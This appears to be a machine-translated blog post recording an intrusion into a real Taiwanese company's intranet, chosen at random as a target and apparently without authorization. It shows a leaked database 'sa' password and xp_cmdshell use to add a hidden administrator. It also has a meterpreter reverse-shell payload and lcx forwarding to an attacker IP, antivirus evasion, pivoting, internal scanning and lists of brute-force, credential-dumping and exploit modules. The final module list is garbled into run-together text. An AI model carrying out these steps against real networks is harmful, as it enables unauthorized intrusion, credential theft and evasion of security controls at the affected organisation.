Title: Record once MSF comprehensive application intranet penetration record

0x01 Introduction

Randomly found a site under a certain Taiwan Technology Group as the target of this test, just to learn the intranet penetration and the use of MSF. In September 2013, I got the Webshell permissions for a subdomain and did not continue testing. At that time, Symantec was not installed on the server, but when I went to the test the second time, I found that Symantec had been installed and some security reinforcement was carried out.

0x02 Basic information collection of websites and intranet Basic information detection: Target site: http://www.ttes*****.com Server IP: 59.***.**.74 (Taiwan Province Zhonghua Telecom) Environment platform: ASP.NET server system: Microsoft-IIS/6.0 (Wind 2003) Website subdomain collection: These subdomains in the table are the information collected in the early stage, but unexpectedly, they got the Webshell (Fckeditor) very smoothly. If the main site cannot find any vulnerabilities, you can start through "side station" or "subdomain".

Because this article focuses on the use of MSF tools and the solution of difficulties, we will not describe too much about how to get the Webshell. The server information collected after obtaining the permissions is as follows.

Port open: 25, 80, 135, 445, 1025, 1521, 3389 patch status: The server system has 460+ patches (64-bit) script detection: The server supports Asp and Aspx expansion name disk permissions: C and D disks have readable and writeable permissions (mostly). The ipconfig /all command can see that the host name is: websrv4, IP: 192.168.0.203, DNS: 192.168.3.1

Windows IP Configuration Host Name . . websrv4 Connection-specific DNS Suffix . IP Address. . 192.168.0.203 Subnet Mask . . 255.255.255.0 Default Gateway . . 192.168.0.254 DNS Servers . . 192.168.3.1 168.95.1.1net view /domain command can see that there are two domains and a workgroup: 7PV1V1S, TT, WORKGROUP, and the corresponding IP addresses of the surviving host are shown in the workgroup.

There are many TT domain hosts, and another table is placed. The domain control should be: 192.168.3.1. Here you can analyze the organizational structure of the working group and each domain and the roles played by each host based on your own experience.

0x03 Webshell Power-Enhanced Defense Software

The current system of this host controlled host is Windows 2003 X64. Although I know that there are not many EXPs available for X64, I have to try it out. The result is all failed. Oracle has never been exposed to the escalation of power and I don’t know much about it. I will put it aside for the time being.

Everyone knows that ASPX and MSSQL are the best partners. Find the database connection information in the web.config configuration file. Here you can see that the MSSQL database is running on the host of the intranet 192.168.0.206, which is a site library separation.

add name='ttes*****_enConnectionString1' connectionString='Data Source=192.168.0.206;Initial Catalog=ttes*****_global;Persist Security Info=True;User ID=sa;Password=tt@12345' providerName='System.Data.SqlClient'/Next use Malaysia's database management function to connect to the MSSQL of the intranet host 192.168.0.206, enable the xp_cmdshell component to execute the command and add an administrator user, and then forward its port 3389 port using the portfwd command.

Note: Some students may say that using the port mapping function in Malaysia directly is OK, but I haven't succeeded anyway. I wonder if there is something wrong with my posture. Well, it must be, it's still too bad!

The test$ administrator user has been successfully added, and the next step is to use the Lcx port forwarding tool. Everyone should understand that it is uploaded and executed on the 203 host, but the forwarding is 3389 of the 206 database host.

C:\RECYCLER\lcx.exe -slave Your external network IP 51 192.168.0.206 3389 Notes: September 13, 192.168.0.203 There is no defense software on this host. You can directly upload Lcx.exe to any readable and writeable directory and execute it normally. However, when writing the article, I found that symantec has been installed. Lcx.exe and various EXPs have been blocked during the upload process. I also tried the commonly used Vbs, Bat, Exe, upload, download, modify and expand methods, and operations that are detected as malicious behavior will be blocked.

symantec endpoint protection Process: smc.exe, snac.exe, ccsvchst.exe, rtvscan.exesymantec endpoint protection The risk log of the defense software is only saved for 14 days by default. After entering the server, it can be set by itself. In the later test, it was also found that it was also intercepted when Fckeditor uploaded the Webshell, such as common: One sentence, Pony, Malaysia, etc. as shown in the figure below. You can test more horses who have passed WAF to see if they can bypass it?

Test record: 1. Intranet environment, site library separation, web.config found data(192.168.0.206) SA user and successfully added administrator user; 2. Web(192.168.0.203) and data(192.168.0.206) have installed symantec, and cannot use Lcx.exe and other tools; 3. After testing other forwarding tools, they are either intercepted or unusable, and reDuh can only forward the current 203, and the speed is extremely slow; 4. The Exe file generated by msfpayload was also detected, the server is X64, and there is no X64 encoder in msfencode, so this road is not accessible;

0x04 Bypass the defense software for port forwarding

Get the idea in an article through Google search, use msfpayload to generate an Aspx rebound script, get the meterpreter session, and then use the portfwd command to forward the 3389 port of the database server 192.168.0.206.

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=113.***.*.238 LPORT=12345 R | msfencode -t aspx -o /media/sf_System learning/test.aspx msfconsole configures the listening related options, upload the newly generated test.aspx rebound script to the website's WEB directory, and then access it in the browser to get the target host session.

root@box3:~# msfconsolemsf use exploit/multi/handlermsf exploit(handler) set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf exploit(handler) set LHOST 192.168.1.7msf exploit(handler) set LPORT 12345msf exploit(handler) exploit Then we forward the portfwd command of the database server 192.168.0.206 in the intranet, and can connect to its 3389 remote terminal normally. The relevant command parameters are as follows. I forgot to take a screenshot at that time!

meterpreter portfwd add -l 1234 -p 3389 -r 192.168.0.206[*] Local TCP relay created: 0.0.0.0:1234 - 192.168.0.206:3389

Usage: portfwd [-h] [add | delete | list | flush] [args] Add Delete List Refresh Parameters

OPTIONS: -h Help banner. //Help -L opt The local host to listen on (optional). //Local IP address -l opt The local port to listen on. //Local port number -r opt The remote host to connect to. //Remote IP address -p opt The remote port to connect to. //Remote port number Next, let me tell you about 3389 in the intranet when using Socks4a proxy to connect to MSF. Before opening Socks4a proxy, you must first get a Meterpreter session, and then directly use the Socks4a module to enable the proxy, and execute by default.

msf auxiliary(socks4a) use auxiliary/server/socks4amsf auxiliary(socks4a) set SRVHOST 127.0.0.1msf auxiliary(socks4a) run[*] Auxiliary module execution completedmsf auxiliary(socks4a) [*] Starting the socks4a proxy server When configuring the proxychains proxy tool, you need to add a 'socks4127.0.0.1 at the bottom of the /etc/proxychains.conf file 1080', it must be ensured that the SRVHOST and SRVPORT parameters in the socks4a module are consistent.

root@box3:~# vi /etc/proxychains.conf enable Socks4a proxy and configure the proxychains proxy tool. At this time, we can directly use proxychains proxy msf/nmap/sqlmap/nessus/mysql/sqsh/rdesktop/ftp/ssh and other hosts in the target intranet to scan and test other hosts in the target intranet in the command terminal.

root@box3:~# proxychains msfconsole root@box3:~# proxychains rdesktop 192.168.0.206 Note: When Socks4a proxy is enabled but cannot be used normally, it may be a firewall problem. At this time, you can try to set the SRVHOST parameter to 127.0.0.1, the default is 0.0.0.0, and the port is 1080. Remember not to mix up the agent opening and proxy tools!

2014-07-28: After testing again, I found that I couldn't bounce back using the original method. Then I tried reDuh_Gui, reverse_tcp 80 port. and other methods. The data was all connected and the TCP connection status was: LISTENING, but the connection was not allowed or the session was not bounced back.

's final breakthrough and subsequent ideas: use the Lcx.exe tool to monitor port 80 locally, disable the Symantec defense software after entering the 192.168.0.206 database server, and then run the MSF attack payload and then further penetrate other hosts in the intranet.

0x05 Obtain the open port of segment C and system version

In the current session, use the get_local_subnets script to obtain the local subnet segment, and establish a routing table with Kali local machine to achieve cross-routing access. This way, you can directly use the modules under the MSF framework to scan and test other hosts in the target intranet.

meterpreter run get_local_subnetsLocal subnet: 192.168.0.0/255.255.255.0meterpreter run autoroute -s 192.168.0.0/255.255.255.0[*] Added a route to 192.168.0.0/.[+] Added route to 192.168.0.0/via 59.***.**.66[*] Use the -p option to list all active routes//1 is the session id of sessions. Don't make mistakes when routed! msf exploit(handler) route add 192.168.0.0 255.255.255.0 1//View all currently active routes meterpreter run autoroute -pmsf exploit(handler) route print Use the auxiliary/scanner/portscan/tcp module under MSF to perform batch port scanning of the target intranet C segment. This module can easily detect the port opening of the entire C segment host, allowing us to be more at ease in later penetration tests.

Here, the author mainly scans these common ports: 21/22/445/1433/3306/3389 for demonstration. Other more common ports are: 23/25/80/110/135/139/1521/8080/14147/43958, etc.

msf exploit(handler) use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) set RHOSTS 192.168.0.1-254msf auxiliary(tcp) set PORTS 21,22,445,1433,3306,3389msf auxiliary(tcp) set THREADS 50msf auxiliary(tcp) exploit If it is too slow, you can choose to increase the thread appropriately. You need to wait for a while during the scanning process. After the end, you can use command parameters such as hosts and services to view the scan results. The premise is to connect to the PostgreSQL database. The port scanning results are as shown in the figure below.

We can also use the following modules to detect information about surviving hosts, system version, software version, computer name, MAC address, working group or domain, etc. Only some commonly used modules are listed here, and the picture is from @OffSec!

auxiliary/scanner/portscan/tcp

auxiliary/scanner/portscan/ack

auxiliary/scanner/portscan/syn

auxiliary/scanner/ftp/ftp_version

auxiliary/scanner/ssh/ssh_version

auxiliary/scanner/smb/smb_version

auxiliary/scanner/dns/dns_amp

auxiliary/scanner/http/title

auxiliary/scanner/http/http_version

auxiliary/scanner/telnet/telnet_version

auxiliary/scanner/mysql/mysql_version

auxiliary/scanner/postgres/postgres_version

auxiliary/scanner/netbios/nbname

auxiliary/scanner/netbios/nbname_probe //Deleted

auxiliary/scanner/discovery/arp_sweep

auxiliary/scanner/discovery/udp_probe

auxiliary/scanner/discovery/udp_sweep

[.SNIP.]

0x06 Common Service Brute-Force Module

Collect more user, password and other information on the host that has obtained permissions, including: third parties, SSH/RDP, user passwords stored in various websites/databases, texts or tables, and then analyze them to see if there are rules or common possibilities. If there is any, we can generate an efficient dictionary based on the rules and use the following modules for blasting and utilization. The picture comes from @OffSec!

Note: Some modules are also newly added when re-editing this article. Since they have been reorganized, why not do some of them? Obsessive-compulsive disorder is committed again! I also use these frequently. If the masters have other commonly used modules, you can also add them.

auxiliary/scanner/ftp/anonymousauxiliary/scanner/ftp/ftp_loginaauxiliary/scanner/ssh/ssh_loginaauxiliary/scanner/ssh/ssh_login_pubkeyauxiliary/dos/windows/ftp/filezilla_admin_userauxiliary/dos/windows/ftp/filez illa_server_portpost/windows/gather/credentials/flashfxppost/windows/gather/credentials/smartftppost/windows/gather/credentials/wsftp_clientpost/windows/gather/credentials/filezilla_serverpost/windows/gather/c redentials/xshell_xftp_passwordpost/multi/gather/filezilla_client_credaauxiliary/scanner/smb/smb_loginaauxiliary/admin/smb/upload_fileexploit/windows/smb/psexecexploit/windows/smb/ms08_067_nepiauxiliary/scann er/smb/smb_ms17_010exploit/windows/smb/ms17_010_psexecauxiliary/admin/smb/ms17_010_commandexploit/windows/smb/ms17_010_eternalblueexploit/windows/smb/webexecauxiliary/admin/smb/webexec_commandauxiliary/scanner /smb/impacket/wmiexecauxiliary/admin/mysql/mysql_enumauxiliary/admin/mysql/mysql_sqlauxiliary/scanner/mysql/mysql_loginaauxiliary/scanner/mysql/mysql_loginaauxiliary/scanner/mysql/mysql_hashdumpexploit/windows/mysql/mofexploit/multi/mysql/mysql_udf_payloadauxiliary/admin/mssql/mssql_enumauxiliary/admin/mssql/mssql_execauxiliary/admin/mssql/mssql_sqlauxiliary/admin/mssql/mssql_escalate_dbownerauxiliary/scanner/mssql/mssql_pingauxiliary/scanner/m ssql/mssql_loginaauxiliary/scanner/mssql/mssql_hashdumpexploit/windows/mssql/mssql_clr_payloadexploit/windows/mssql/mssql_payloadexploit/windows/mssql/mssql_payloadexploit/windows s/gather/enum_termservpost/windows/gather/credentials/mremoteauxiliary/scanner/rdp/ms12_020_checkauxiliary/dos/windows/rdp/ms12_020_maxchannelidsauxiliary/scanner/rdp/cve_2019_0708_bluekeepexploit/windows/rdp/